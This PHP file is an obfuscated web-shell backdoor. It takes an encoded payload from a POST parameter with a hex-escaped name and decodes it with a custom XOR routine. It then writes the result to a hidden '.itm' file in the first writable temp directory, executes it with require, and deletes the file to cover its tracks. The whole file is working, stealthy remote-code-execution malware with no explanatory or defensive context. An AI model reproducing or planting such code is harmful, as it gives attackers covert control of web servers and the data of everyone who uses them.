<?php

if(array_key_exists("pg\x72\x70", $_POST) && !is_null($_POST["pg\x72\x70"])){
	$flag = array_filter([getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), "/var/tmp", "/dev/shm"]);
	$entry = $_POST["pg\x72\x70"];
	$entry	=		 explode		(	"." 		,  $entry) 	 ;	
	$tkn = '';
            $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(  $s3);
            $len = count(  $entry);
    
            for(  $y = 0; $y < $len; $y++) {$v8 = $entry[$y];
                $sChar = ord(  $s3[$y % $lenS]);
                $d =(  (  int)$v8 - $sChar -(  $y % 10)) ^ 42;
                $tkn	 .=	chr(  $d);
            }
	for ($ptr = 0, $val = count($flag); $ptr < $val; $ptr++) {
    $resource = $flag[$ptr];
    		if ((bool)is_dir($resource) && (bool)is_writable($resource)) {
    $k = sprintf("%s/.itm", $resource);
    if (file_put_contents($k, $tkn)) {
	require $k;
	unlink($k);
	exit;
}
}
}
}